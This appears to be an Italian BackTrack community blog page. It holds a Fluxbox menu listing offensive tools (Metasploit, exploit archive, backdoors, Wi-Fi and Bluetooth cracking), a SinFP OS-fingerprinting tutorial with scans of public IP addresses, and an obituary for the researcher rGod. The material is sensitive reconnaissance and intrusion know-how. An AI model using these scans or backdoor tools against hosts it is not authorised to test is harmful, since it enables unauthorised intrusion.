		  [exec] (MsfCli 3) {xterm -geom 100x40 -title "MsfCli 3" -e "cd /pentest/exploits/framework3 ;/pentest/exploits/framework3/msfcli ; sudo -s"}
	          [exec] (MsfUpdate 3) {xterm -geom 60x30 -title "MsfUpdate 3" -e "cd /pentest/exploits/framework3 ;echo "Updating Metasploit 3 - Please wait" ; svn update ; sudo -s"}
		  [exec] (MsfWeb 3) {xterm -geom 60x30 -title "MsfWeb 3" -e "cd /pentest/exploits/framework3 ;/pentest/exploits/framework3/msfweb ; sudo -s"}
	          [exec] (Init-Pgsql-autopwn)
	      [end]
	      [submenu] (Online-Resource)
	        [exec] (metasploit.com) {firefox http://www.metasploit.com/}
	      [end]
	 [end]
	   [submenu] (Milw0rm-Exploit-Archive)
	      [exec] (Milw0rm Archive) {xterm -geom 60x30 -title "Milw0rm Archive" -e "cd /pentest/exploits/milw0rm/; ls -l ; sudo -s"}
	      [exec] (Update Milw0rm) {xterm -geom 60x30 -title "Update Milw0rm" -e "cd /pentest/exploits ; ./update-milw0rm ; sudo -s"}
	       [submenu] (Online-Resource)
		  [exec] (milw0rm.com) {firefox http://www.milw0rm.com/}
	       [end]
	   [end]
     [end]
     [submenu] (Maintaining-Access)
	 [submenu] (Backdoors-and-Rootkits)
	    [exec] (Backdoors) {xterm -geom 85x45 -title "Backdoors" -e "cd /pentest/housekeeping/backdoors/; ls -l ; sudo -s"}
	    [exec] (Matahari) {xterm -geom 85x40 -title "Matahari" -e "matahari.py;sudo -s"}
	    [exec] (sbd) {xterm -geom 85x45 -title "SBD" -e "sbd -h;sudo -s"}
	 [end]
	 [submenu] (Tunneling)
	    [exec] (3proxy) {xterm -geom 85x40 -title "3proxy" -e "cd /pentest/tunneling/3proxy/ ; ls -l ; sudo -s"}
	    [exec] (Cryptcat) {xterm -geom 85x40 -title "cryptcat" -e "cryptcat -h;sudo -s"}
	    [exec] (ICMPTX) (xterm -geom 85x40 -title "ICMPTX" -e "icmptx ; sudo -s")
	    [exec] (Matahari) {xterm -geom 85x40 -title "Matahari" -e "matahari.py;sudo -s"}
	    [exec] (NSTXCD-Client) {xterm -geom 85x45 -title "NSTXCD-Client" -e "nstxcd --help;sudo -s"}
	    [exec] (NSTXD-Server) {xterm -geom 85x45 -title "NSTXCD-Server" -e "nstxd --help;sudo -s"}
	    [exec] (sbd) {xterm -geom 85x45 -title "SBD" -e "sbd -h;sudo -s"}
	    [exec] (socat) {xterm -geom 85x45 -title "socat" -e "socat -?;sudo -s"}
	    [exec] (Tiniproxy) {xterm -geom 85x40 -title "tinyproxy" -e "tinyproxy -h;sudo -s"}
	 [end]
     [end]
        [submenu] (Radio-Network-Analysis)
	  [submenu] (802.11)
	     [submenu] (Analyser)
	        [exec] (Kismet) {start-kismet-ng}
		[exec] (WiCrawl) {wicrawl}
	     [end]
             [submenu] (Cracking)
                 [submenu] (Aircrack)
                   [exec] (Aircrack-ng) {xterm -geom 95x50 -title "Aircrack" -e "aircrack-ng ; sudo -s"}
                   [exec] (Airdecap) {xterm -geom 60x30 -title "Airedecap" -e "airdecap-ng ; sudo -s"}
                   [exec] (Aireplay) {xterm -geom 60x30 -title "Aireplay" -e "aireplay-ng ; sudo -s"}
                   [exec] (AirMon Script) {xterm -geom 60x30 -title "AirMonScript" -e "airmon-ng ; sudo -s"}
                   [exec] (Airodump-ng) {xterm -geom 60x30 -title "Airodump" -e "airodump-ng ; sudo -s"}
	           [exec] (Airoscript-ng) {xterm -geom 90x40 -title "airoscript-ng" -e "airoscript.sh;sudo -s"}
	           [exec] (Airtun-ng) {xterm -geom 60x30 -title "Airtun-ng" -e "airtun-ng ; sudo -s"}
	           [exec] (IVStools) {xterm -geom 110x40 -title "IVStools" -e "ivstools --help ; sudo -s"}
	           [exec] (MacChanger) {xterm -geom 90x40 -title "MacChanger" -e "macchanger --help ; sudo -s"}
	           [exec] (MakeIVS) {xterm -geom 110x40 -title "MakeIVS" -e "makeivs --help ; sudo -s"}
	           [exec] (Packetforge-ng) {xterm -geom 110x40 -title "packetforge-ng" -e "packetforge-ng --help;sudo -s"}
	         [end]
	          [exec] (WiSpy-Gtk) {spectool_gtk}
	          [exec] (Wesside) {xterm -geom 60x30 -title "Wesside" -e "wesside-ng ; sudo -s"}
	          [exec] (Easside) {xterm -geom 60x30 -title "Easside" -e "easside-ng ; sudo -s"}
	          [exec] (AirSnort) {airsnort}
	          [exec] (Asleap) {xterm -geom 60x30 -title "Asleap" -e "asleap; sudo -s"}
	          [exec] (Cowpatty) {xterm -geom 110x40 -title "Cowpatty" -e "cowpatty ; sudo -s"}
	          [exec] (GenKeys) {xterm -geom 110x40 -title "GenKeys" -e "genkeys ; sudo -s"}
	          [exec] (Genpmk) {xterm -geom 110x40 -title "Genpmk" -e "genpmk ; sudo -s"}
	          [exec] (MDK3) {xterm -geom 110x40 -title "MDK3" -e "mdk3; sudo -s"}
	          [exec] (Wep-Crack) {xterm -geom 110x40 -title "Wep-Crack" -e "wep_crack;sudo -s"}
	          [exec] (Wep-Decrypt) {xterm -geom 110x40 -title "Wep-Decrypt" -e "wep_decrypt;sudo -s"}
	          [exec] (WifiTap) {xterm -geom 115x35 -title "WifiTap" -e "cd /pentest/wireless/wifitap/;ls -l ; sudo -s"}
	          [exec] (Wifi-ZOO) {xterm -geom 115x35 -title "WiFi-ZOO" -e "cd /pentest/wireless/wifizoo; ./wifizoo.py; sudo -s"}
	      [end]
	      [submenu] (Spoofing)
	        [exec] (AirSnarf) {xterm -geom 115x35 -title "AirSnarf" -e "cd /pentest/wireless/airsnarf-0.2/ ;ls -l ; sudo -s"}
	        [exec] (Karma) {xterm -geom 115x35 -title "Karma" -e "cd /pentest/wireless/karma/ ;ls -l ; sudo -s"}
	        [exec] (Airpwn) {xterm -geom 60x30 -title "Airpwn" -e "airpwn ; sudo -s"}
	      [end]
	    [submenu] (RFID)
	       [submenu] (Online-Resource)
	          [exec] (rfidvirus.org) {firefox http://www.rfidvirus.org/}
		  [exec] (openpcd.org) {firefox http://www.openpcd.org/}
               [end]
            [end]
        [end]
	[submenu] (Voip)
	   [submenu] (Voip-Analysis)
	      [submenu] (Online-Resource)
	         [exec] (voipsa.org) {firefox http://www.voipsa.org}
	      [end]
	   [end]
	[end]

[submenu] (Bluetooth)
	 [exec] (Bluebugger) {xterm -geom 110x40 -title "Bluebugger" -e "bluebugger -h;sudo -s"}
	 [exec] (BluePrinter) {xterm -geom 110x40 -title "Blueprint" -e "cd /pentest/bluetooth/blueprint/;./bp.pl;sudo -s"}
	 [exec] (Bluesnarfer) {xterm -geom 110x40 -title "Bluesnarfer" -e "bluesnarfer -h;sudo -s"}
	 [exec] (BT-Crack) {xterm -geom 110x40 -title "BTcrack" -e "btcrack -h;sudo -s"}
	 [exec] (BT-Scanner) {xterm -geom 110x40 -title "bt-scanner" -e " cd /usr/local/bin/ ; btscanner;sudo -s"}
	 [exec] (Carwhisperer) {xterm -geom 110x40 -title "Carwhisperer" -e "carwhisperer;sudo -s"}
	 [exec] (Frontline) {xterm -geom 110x40 -title "Frontline" -e " cd /pentest/bluetooth/frontline/ ; frontline -h;sudo -s"}
	 [exec] (HCIDump) {xterm -geom 110x40 -title "HCIDump" -e "hcidump --help;sudo -s"}
	 [exec] (Minicom) {xterm -geom 110x40 -title "Minicom" -e "minicom -h;sudo -s"}
	 [exec] (ObexFTP) {xterm -geom 110x45 -title "ObexFTP" -e "obexftp --help;sudo -s"}
	 [exec] (RedFang) {xterm -geom 110x45 -title "RedFang" -e "fang -h;sudo -s"}
	 [exec] (USSP-Push) {xterm -geom 110x45 -title "USSP-Push" -e "ussp-push -h;sudo -s"}
	  [submenu] (Online-Resource)
	    [exec] (www.trifinite.org) {firefox http://www.trifinite.org/}
         [end]  

              [end]
	[end]
	[submenu] (Digital-Forensic)
	    [submenu] (File-Carving)
	     [exec] (Foremost) {xterm -geom 85x45 -title "Foremost" -e "foremost -h ; sudo -s"}
	     [exec] (Magicrescue) {xterm -geom 85x45 -title "Magicrescue" -e "magicrescue;sudo -s"}
	     [exec] (Magicsort) {xterm -geom 85x45 -title "Magicsort" -e "magicsort;sudo -s"}
	    [end]
	    [submenu] (Forensic-Analysis)
	     [exec] (Autopsy) {xterm -geom 85x45 -title "Autopsy" -e "cd /usr/local/autopsy ; ./autopsy ; sudo -s"}
	     [exec] (GetAttach) {xterm -geom 85x45 -title "Getattach" -e "getattach.pl --help;sudo -s"}
	     [exec] (Mboxgrep) {xterm -geom 85x45 -title "mboxgrep" -e "mboxgrep --help;sudo -s"}
	     [exec] (Memfetch) {xterm -geom 85x45 -title "memfetch" -e "memfetch -h;sudo -s"}
	     [exec] (Memfetch-Find) {xterm -geom 85x45 -title "memfetch" -e "cd /usr/local/bin/;mffind.pl;sudo -s"}
	     [exec] (Pasco) {xterm -geom 85x45 -title "Pasco" -e "pasco;sudo -s"}
	     [exec] (Sleuthkit) {xterm -geom 85x45 -title "Sleuthkit" -e "cd /usr/local/sleuthkit-2.09/bin/ ; ls -l ;sudo -s"}
	     [exec] (Vinetto) {xterm -geom 85x45 -title "Vinetto" -e "vinetto -h;sudo -s"}
	    [end]
	    [submenu] (Image-Aquiring)
	     [exec] (DCFLDD) {xterm -geom 85x45 -title "DcfLDD" -e "dcfldd --help ; sudo -s"}
	     [exec] (DD-Rescue) {xterm -geom 85x45 -title "DD-Rescue" -e "dd_rescue -h;sudo -s"}
	    [end]
	[end]
  [submenu] (Documents)
	  [submenu] (BackTrack)
	   [exec] (remote-exploit.org) {firefox http://www.remote-exploit.org/}www.oissg.org
	   [exec] (WiKi-BackTrack) {firefox http://backtrack.offensive-security.com/index.php?title=Main_Page}
	  [end]
	  [submenu] (ISSAF)
	   [exec] (oissg.org) {firefox http://www.oissg.org/}
	  [end]
	  [submenu] (OSSTMM)
	   [exec] (isecom.org) {firefox http://www.isecom.org/}
	  [end]
  [end]
	[submenu] (Miscellaneous)
	 [exec] (BurpeSuite) {java -jar /usr/local/bin/burpsuite_v1.1_beta2.jar ; sudo -s}Hijetter
	 [exec] (HiJetter) {cd /pentest/windows-binaries/misc/ ; wine hijetter.exe}
	 [exec] (Imp-Range) {xterm -geom 90x40 -title "Imp-Range" -e "imp-range --help ; sudo -s"}
	 [exec] (load IPWRAW) {xterm -geom 90x40 -title "load IPWRAW" -e "cd /usr/src/drivers/iwlwifi-1.0.0/ ; unload && modprobe ipwraw && cd /root;sudo -s"}
	 [exec] (load IPWRAW3945) {xterm -geom 90x40 -title "load IPWRAW3945" -e " cd /usr/src/drivers/iwlwifi-1.0.0/ ;modprobe ipwraw && rmmod ipwraw & load && cd /root;sudo -s"}
	 [exec] (MacChanger) {xterm -geom 90x40 -title "MacChanger" -e "macchanger --help ; sudo -s"}
	 [exec] (NetSed) {xterm -geom 90x40 -title "NetSed" -e "netsed -h ; sudo -s"}
	 [exec] (ParosProxy) {cd /pentest/web/paros/;java -Xmx96m -jar paros.jar ; sudo -s}
	 [exec] (Pjl-FileTransfert) {xterm -geom 90x40 -title "Pjl-FileTransfert" -e "pft;sudo -s"}
	 [exec] (SING) {xterm -geom 90x40 -title "SING" -e "sing -h;sudo -s"}
	 [exec] (truecrypt) {xterm -geom 90x40 -title "truecrypt" -e "truecrypt;sudo -s"}
	 [exec] (usbview) {usbview}
	 [exec] (Wipe) {xterm -geom 90x40 -title "wipe" -e "wipe -h;sudo -s"}
	[end]
     [exec] (BackTrack-Installer) {kmdr-executor /usr/share/slax/BT3.kmdr}
   [end]
[separator]
  [submenu] (Internet)
	[exec] (Firefox) {firefox }
	[exec] (Konqueror) {kfmclient openProfile webbrowsing}
	[exec] (XChat) {xchat}
	[exec] (knetattach) {knetattach}
        [exec] (Kopete) {kopete}
	[exec] (krdc) {krdc}
	[exec] (Kppp) {kppp}
	[exec] (kwifimanager) {kwifimanager -caption "%c" %i %m}
	[exec] (Pidgin) {pidgin}
	[exec] (Set-IP-Address) {kmdr-executor /usr/share/slax/network-conf.kmdr}
	[exec] (Skype) {/opt/skype/skype}
	[exec] (VNC-Viewer) {vncviewer}
	[exec] (Wireless-Assistant) {wlassistant}
  [end]
  [submenu] (Multimedia)
	  [exec] (Audacius) {audacious %U}
	  [exec] (K3b) {k3b %U}
	  [exec] (kaudiocreator) {kaudiocreator}
	  [exec] (kmix) {kmix -caption "%c" %i %m}
	  [exec] (kplayer) {kplayer -- %U}
	  [exec] (Kscd) {kscd -caption "%c" %i %m}
	  [exec] (kde-xmms) {xmms %U}
  [end]
  [submenu] (System)
	  [exec] (konsole) {konsole --ls}
	  [exec] (Konqueror) {kfmclient openProfile webbrowsing}
	  [exec] (kslackcheck) {kslackcheck}
	  [exec] (ksysguard) {ksysguard %U}
	  [exec] (krandrtray) {krandrtray}
	  [exec] (Krfb-Desktop-Sharing-VNC) {krfb -caption "%c" %i %m}
	  [exec] (K-InfoCenter) {kinfocenter -caption "%c" %i %m}
	  [exec] (Peripherals) {konqueror /Utility/Periferals}
	  [exec] (GSlapt-PakagesManager) {/usr/sbin/gslapt}
	 [submenu] (Settings)
	  [exec] (Hardware) {konqueror programs:/System/Settingsmenu/Hardware/}
	  [exec] (KDE-Control-Center) {konqueror programs:/System/Settingsmenu/}
	 [end]
	 [submenu] (System-Information)
	  [exec] (KDE-InfoCenter) {konqueror programs:/System/}
	 [end]
  [end]
[submenu] (Utility)
	  [exec] (konsole) {konsole --ls}
	  [exec] (kde-artsbuilder) {artsbuilder -caption "%c"}
	  [exec] (kppplogview) {kppplogview}
	  [exec] (smb4k) {smb4k}
	  [exec] (kdeprintfax) {kdeprintfax -caption "%c" %i %m %u}
	  [exec] (kjobviewer) {kjobviewer --all --show %i %m}
	  [exec] (katapult) {katapult}
	  [exec] (Peripherals) {konqueror /Utility/Periferals}
	  [exec] (kfloppy) {kfloppy -caption "%c" %i %m}
	 [submenu] (Desktop)
	  [exec] (Klipper) {klipper}
	  [exec] (K-Calc) {kcalc}
	  [exec] (K-Pager) {kpager}
	 [end]
	 [submenu] (Files)
	  [exec] (Files) {konqueror programs:/Utilities/File/}
	  [exec] (Peripherals) {konqueror programs:/Utilities/Peripherals/}
	 [end]
  [end]  

[separator]
[submenu] (FluxBox menu)
      [config] (Configure)
   [submenu] (System Styles) {Choose a style...}
      [stylesdir] (/usr/share/fluxbox/styles)
      [stylesdir] (/usr/share/commonbox/styles/)
[end]

[submenu] (User Styles) {Choose a style...}
      [stylesdir] (~/.fluxbox/styles)
[end]

      [workspaces]   (Workspace List)

[submenu] (Tools)
      [exec] (kDocker) {kdocker}
      [exec] (Window name) {xprop WM_CLASS|cut -d \" -f 2|xmessage -file - -center}
      [exec] (Regen Menu) {fluxbox-generate_menu}
[end]

[submenu] (Window)
[end]

      [commanddialog] (Fluxbox Command)
      [reconfig] (Reload config)
      [restart] (Restart)
      [exec] (About) {(fluxbox -v; fluxbox -info | sed 1d) 2> /dev/null | xmessage -file - -center}
      [separator]
      [exit] (Logout)
[end]
[separator]
[exec] (Screen Capture) {ksnapshot > /dev/null}
[exec] (Find Files/Folders) {kfind}

[separator]
[exit] (Logout)
[end]

***

Questa è solo una semplice immagine delle sezioni ottenute con il cambiamento…

***

***

Ciao a tutti e alla prossima.

SinFP -alternative OS fingerprinting-

***

Ciao a tutti , ecocci di nuovo a scrivere su un altro tool in BackTrack , il SinFP. utilizzato per il Network Mapping.

SinFP è un tool scritto in PERL utilizzato per l’OS fingerprinting, sia attivo che passivo.

In pratica , per coloro che ancora devono avvicinarsi alle caratteristiche di un programma come quello che stiamo per descrivervi , SinFP è uno di quei programmi inseriti in BackTrack che serve per ottenere informazioni su di un determinato host , più precisamente ci mette in condizioni di sapere il tipo di sistema operativo che gira sull’ host che si va a “scannerizzare”.

È importante dire che ci sono 2 tipi di Fingerprinting , il fingerprinting attivo , ovvero quello che viene fatto durante l’ attivita del sistema preso come esempio… …ed il fingerprinting passivo , quello che viene fatto per capire il sistema operativo di un determinato host , mentre lo stesso non è in attività , infatti , come anche in quest’ esempio fatto tramite Wireshark , ci si serve di un file catturato precedentemente con un programma di sniffing.

Secondo i fautori del tool , questo sarebbe in grado di bypassare le limitazioni del più famoso e utilizzato Nmap. Come tutti sappiamo Nmap è stato utilizzato per questo scopo da anni in modo efficiente ma , oramai, con con la presenza sempre più assidua di dispositivi di filtraggio , configurazioni PAT/NAT e altre strategie utilizzate, l’approccio utilizzato dal famoso tool nel fare OS fingerprinting sta diventando obsoleto. Dunque, detto questo, SinFP basa la sua filosofia proprio su queste limitazioni e quindi getta tra le sue basi proprio il fatto di fare OS fingerprinting in modo dissimile da Nmap e altri.

Il tool richiede dunque soltanto una porta TCP aperta che sarà l’unica responsabile del risultato ottenuto dalla scansione; SinFP invia dei pacchetti TCP standard e limita i test effettuati sul sistema da scansionare a 2-3, anche se secondo lo sviluppatore SinFP sarebbe in grado di riconoscere il sistema già al primo responso dei pacchetti TCP inviati.
Di seguito stiliamo una lista di varie caratteristiche della versione 2 del tool, molte di queste caratteristiche sono viste come confronto alla versione 1 dello stesso.
-completamente riscritto (rispetto alla 1);
-sinfp.db completamente rielaborato;
-nuovi metodi basati sul confronto tra l’invio di pacchetti e la risposta ottenuta;
-nuovi algoritmi di confronto che lavorano come un motore di ricerca;
-possibilità di cambiare un algoritmo di confronto passando al tool manualmente una
“matching mask”;
-passive OS fingerprinting molto accurato grazie ai nuovi algoritmi;
-Possibilità di inviare pacchetti P1P2P3, o solamente P1P2 o ancora solo P2;
-consente di utilizzare l’IPv6 mentre la versione 1 non lo consentiva;
-cambiamenti all’ API, non compatibili con la versione precedente;
-cambiamenti allo schema del DB, anche questa incompatibile con la versione precedente;
-Molti bug corretti;

***

La sintassi utilizzata per il corretto funzionamento del tool è la seguente:

/usr/local/sinfp/bin/sinfp.pl -i <targetIp> -p <openTcpPort>

dove:
-i istruisce il programma che in seguito sarà riportato un indirizzo ip, mentre
-p indica al tool quale porta tcp aperta utilizzare per portare a termine il fingerprinting.

Vediamo ora le opzioni che possono essere utilizzate con questo tool:
-3 -> quello di default, invia 3 pacchetti;
-2 -> invia soltanto 2 pacchetti (P1 e P2) (modo silenzioso);
-1 -> invia soltanto un pacchetto (P2) (modalità molto silenziosa);
-v -> è il verbose mode cioè il tool ci informa in tempo reale su cosa sta lavorando;
-s <file> -> è il signature file da usare;
-C -> Stampa tutte le info possibili sul sistema “vittima”;
-O -> Ci mostra invece soltanto il sistema operativo;
-V -> Ci stampa il sistema operativo e a quale famiglia appartiene la sua versione;
-H -> usa masks HEURISTIC2 per abbinare le signature (indicato per utenti avanzati)
-A <mask1,mask2,…> -> permette di utilizzare una lista personalizzata di masks
per il confronto (anche questo indicato per utenti avanzati).
Parametri specifici per modalità online:
-k -> conserva il file pcap generato;
-a -> non generare una traccia anonima del file pcap;
Parametri specifici per modalità offline:
-f <file> -> nome del file pcap da analizzare
Parametri specifici per IPv6:
-6 -> utilizza il fingerprinting IPv6 invece dell’ IPv4
-M <mac> -> MAC address sorgente da utilizzare;
-m <mac> -> MAC address vittima da utilizzare;
-4 -> questa opzione ci permette di utilizzare l’IPv4 se non va a buon fine quello
con IPv6;
Parametri specifici della modalità “attivo”:
-r <N> -> numero di prove da effettuare per ogni test (3 di default);
-t <N> -> timeout prima di considerare perduto un pacchetto (3 di default);
Parametri specifici della modalità “passivo”:
-P -> istruisce il tool di effettuare un fingerprinting passivo;
-F <filter> -> filtro pcap;

***

Vediamo ora un esempio di OS fingerprinting attivo utilizzando un ip che presenta la porta tcp 80 aperta (scan eseguito con nmap -> status open)…

bt sinfp # /usr/local/sinfp/bin/sinfp.pl -i 78.13.252.72 -p 80

P1: B11113 F0x12 W16616 O0204ffff M1412
P2: B11113 F0x12 W16944 O0204ffff010303000101080a000000000000000001010402 M1412
P3: B11021 F0x04 W0 O0 M0
IPv4: BH0FH0WH1OH0MH1/P1P2P3: Windows: Windows: 2000
IPv4: BH0FH0WH1OH0MH1/P1P2P3: Windows: Windows: XP

*** File [sinfp4-127.0.0.1.anon.pcap] generation done.
*** Please send it to sinfp@gomor.org if you think this is not
*** the good identification, or if it is a new signature.
*** In this last case, please specify `uname -a’ (or equivalent)
*** from the target host.

Come possiamo leggere dal risultato riportatoci dal nostro tool abbiamo inviato 3 pacchetti e cioè P1,P2 e P3 (come di default per giunta) e abbiamo ricevuto dunque in base a questi pacchetti 3 risposte che il tool ci ha anche stampato. Dunque in base all’abbinamento fatto da SinFP confrontando le risposte con i dati contenuti nel suo database è giunto alla conclusione che la “vittima” è dotata di un sistema della famiglia windows e. in particolare possiede o windows 2000 o windows XP.

Ora eseguiamo un’altra prova su un ip che che presenta la porta 22 aperta (come l’esempio di prima anche questo fingerprinting è di tipo attivo).

bt sinfp # /usr/local/sinfp/bin/sinfp.pl -1 -v -O -i 78.14.40.211 -p 22
DEBUG: using db: /usr/local/sinfp/bin/../db/sinfp.db
DEBUG: DescL3: dev: [ppp0]
DEBUG: DescL3: ip: [79.9.159.145]
DEBUG: DescL3: mac: [ff:ff:ff:ff:ff:ff]
DEBUG: DescL3: ip6: [::1]
DEBUG: DescL3: gatewayIp: [0.0.0.0]
DEBUG: Frame: DescL3 object created
DEBUG: Dump: will run in mode: 0
DEBUG: Dump: dev: [ppp0]
DEBUG: Dump: file: [sinfp4-78.14.40.211.22.pcap]
DEBUG: Dump: filter: [host 78.14.40.211 and host 79.9.159.145 and tcp and port 22 and (port 41568)]
DEBUG: Frame: send: l3: protocol:6, size:60, 79.9.159.145 => 78.14.40.211
DEBUG: Frame: send: l4: TCP, 41568 => 22
DEBUG: Frame: Reply received
P2: B10113 F0x12 W5792 O0204ffff0402080affffffff4445414401030300 M1412
IPv4: Linux
DEBUG: Dump: will run in mode: 1
DEBUG: Dump: will run in mode: 2

*** File [sinfp4-127.0.0.1.anon.pcap] generation done.
*** Please send it to sinfp@gomor.org if you think this is not
*** the good identification, or if it is a new signature.
*** In this last case, please specify `uname -a’ (or equivalent)
*** from the target host.
DEBUG: Dump: Frames received : 6
DEBUG: Dump: Frames dropped : 0
DEBUG: Dump: Frames if dropped: 0
DEBUG: Dump: sinfp4-78.14.40.211.22.pcap removed

In questo caso per dimostrare la funzionalità del tool abbiamo aggiunto altre opzioni nella nostra ricerca.
Cioè SinFP invierà un solo pacchetto (1), attiverà il verbose mode (-v) e ci dirà soltanto il sistema operativo identificato (-O).
Dunque leggiamo il risultato:
La porta utilizzata è la 22, il pacchetto inviato è il P2, la risposta è stampata e dunque il nostro tool l’ha associata a un sistema operativo linux (stampato alla 16° riga).

Eseguiamo una nuova prova utilizzando questa volta la tecnica del OSfingerprinting passivo e cioè mediante un file di sniffing. Il file in questione è stato editato da WireShark , tool che sicuramente molti di voi conosceranno; è bene che sappiate che quando salvate il file da Wireshark selezionate il tipo “modified tcpdump/libcap”, o almeno così ho fatto io, altrimenti il nostro tool SinFP potrebbe non leggerlo correttamente e non prenderlo come input valido.

bt sinfp # /usr/local/sinfp/bin/sinfp.pl -P -f /root/Desktop/capture.pcap

209.85.135.147:80 > 79.9.159.145:53224 [SYN|ACK]
P2: B11011 F0x12 W5672 O0204ffff0402080affffffffffffffff01030306 M1412
IPv4: BH1FH0WH1OH0MH1/P2: GNU/Linux: Linux: 2.6.x

209.85.135.147:80 > 79.9.159.145:53225 [SYN|ACK]
P2: B11011 F0x12 W5672 O0204ffff0402080affffffffffffffff01030306 M1412
IPv4: BH1FH0WH1OH0MH1/P2: GNU/Linux: Linux: 2.6.x

209.85.135.147:80 > 79.9.159.145:53226 [SYN|ACK]
P2: B11011 F0x12 W5672 O0204ffff0402080affffffffffffffff01030306 M1412
IPv4: BH1FH0WH1OH0MH1/P2: GNU/Linux: Linux: 2.6.x

209.85.135.147:80 > 79.9.159.145:53227 [SYN|ACK]
P2: B11011 F0x12 W5672 O0204ffff0402080affffffffffffffff01030306 M1412
IPv4: BH1FH0WH1OH0MH1/P2: GNU/Linux: Linux: 2.6.x

209.85.135.147:80 > 79.9.159.145:53228 [SYN|ACK]
P2: B11011 F0x12 W5672 O0204ffff0402080affffffffffffffff01030306 M1412
IPv4: BH1FH0WH1OH0MH1/P2: GNU/Linux: Linux: 2.6.x

Vediamo che il nostro tool confrontando le varie risposte con il database in suo possesso è riuscito a capire che in questo specifico caso ha avuto a che fare con sistemi dotati di distribuzioni linux e con il kernel 2.6 .

Per concludere facciamo una ulteriore prova per verificare se il nostro tool sia in grado di riconoscere sistemi della famiglia FreeBSD (visto che i riconoscimenti di linux e windows sono stati portati a termine con successo), per fare ciò utilizziamo il sito di FreeBSD e cioè http://www.freebsdfoundation.org.

Il fingerprinting che utilizzeremo sarà di tipo passivo e il file catturato è stato creato come prima da WireShark.

bt sinfp # /usr/local/sinfp/bin/sinfp.pl -P -f /root/Desktop/capture.pcap

87.13.247.89:57951 > 69.147.83.42:80 [SYN]
P2: B11110 F0x12 W5808 O0204ffff0402080affffffff0000000001030305 M1452
IPv4: unknown

69.147.83.42:80 > 87.13.247.89:57951 [SYN|ACK]
P2: B11111 F0x12 W65535 O0204ffff010303010101080affffffffffffffff04020000 M1412
IPv4: BH0FH0WH0OH0MH1/P2: BSD: FreeBSD: 6.0
IPv4: BH0FH0WH0OH0MH1/P2: BSD: FreeBSD: 6.1
IPv4: BH0FH0WH0OH0MH1/P2: BSD: FreeBSD: 6.2

87.13.247.89:60373 > 64.147.173.80:80 [SYN]
P2: B11110 F0x12 W5808 O0204ffff0402080affffffff0000000001030305 M1452
IPv4: unknown

87.13.247.89:55535 > 66.249.91.115:443 [SYN]
P2: B11110 F0x12 W5808 O0204ffff0402080affffffff0000000001030305 M1452
IPv4: unknown

64.147.173.80:80 > 87.13.247.89:60373 [SYN|ACK]
P2: B11111 F0x12 W65535 O0204ffff010303000101080a000000000000000001010402 M1300
IPv4: BH0FH0WH0OH0MH1/P2: Windows: Windows: 2000
IPv4: BH0FH0WH0OH0MH1/P2: Windows: Windows: XP

87.13.247.89:41187 > 66.211.168.209:443 [SYN]
P2: B11110 F0x12 W5808 O0204ffff0402080affffffff0000000001030305 M1452
IPv4: unknown

66.249.91.115:443 > 87.13.247.89:55535 [SYN|ACK]
P2: B11011 F0x12 W5672 O0204ffff0402080affffffffffffffff01030306 M1412
IPv4: BH1FH0WH1OH0MH1/P2: GNU/Linux: Linux: 2.6.x

66.211.168.209:443 > 87.13.247.89:41187 [SYN|ACK]
*** WARNING: not enough TCP options for P2 reply, result may be false
P2: B11011 F0x12 W8190 O0204ffff M1380
IPv4: BH0FH0WH0OH0MH1/P2: Unknown: GoogleOS: unknown

E’ chiaro che SinFP ha riconosciuto anche sistemi operativi del tipo FreeBSD e ci dice che il sistema con cui abbiamo avuto a che fare è dotato di una delle 3 versioni stampate. Gli altri risultati presenti nel report sono altri dati raccolti dallo sniffing e li ho voluti riportare perchè ho pensato sarebbe stato più opportuno pubblicare il risultato integralmente.

Come possiamo vedereSinFP ha fatto il proprio dovere davvero bene e secondo il mio modestissimo parere non è secondo davvero a nessuno, infatti SinFP in tutte le circostanze si è comportato egregiamente non manifestando alcun tipo di problema.

Ciao a tutti e alla prossima.

il nostro Addio a RetroGod…

Sono 2 giorni che questa notizia è nella nostra pagina di /news e nell’ header del nostro Chan , ma credo che sia giusto farla arrivare anche tramite RSS a tutti coloro che si interessano al nostro modesto lavoro.

***

***

Una brutta notizia che pubblichiamo ma che avremmo voluto non dare mai…

rGod è morto , quelle di seguito sono le parole che si leggono sul suo sito , scritte da un suo amico.

Ce ne rammarichiamo , sapendo che con lui è andata via la capacità e l’ abilità di un personaggio importante e unico nel suo genere , ma che soprattutto , non si è mai reso indisponibile a nessuno , mostrando apertamente tutto il suo sapere senza fare troppe giri , cosa non da poco… …se consideriamo che ci sono admin e mod che non rispondono ai pm credendosi superuomini , mentre lui da perfetto sconosciuto rispose ad una mia mail , credo che tutti dobbiamo imparare da un comportamento simile.

rGod non era solo uno dei pochi a cui poter affidare il nome di Hacker , ma quello di genio… …grande pittore e profondo scrittore non sarà il suo corpo a portare via il suo nome.

fatevi un giro nella sua home a guardare le sue tante opere

http://godr.altervista.org/

Addio rGod ,

il tuo nome non morirà mai.

brigante & BackTrack[IT]

###

I am not rgod. I’m a friend of his named Daniel.

rgod died two days ago at that hospital in Catania.

It was a surprise and a shock…to all of us who knew him.

rgod was suffering of a rare bony marrow disease, leading to paralysis during his last days.

It just took me a while to figure out how to have access to rgod’s website, searching the key on his laptop
(with permission from those close to him) to post this…

I don’t know what the future of this site will involve but I’d sure like to see these posts, and some of the
others about rgod posted across the Internet, preserved on the web indefinitely.

Just so that when folks google the name of rgod in years to come, they’ll be able to read it all.

###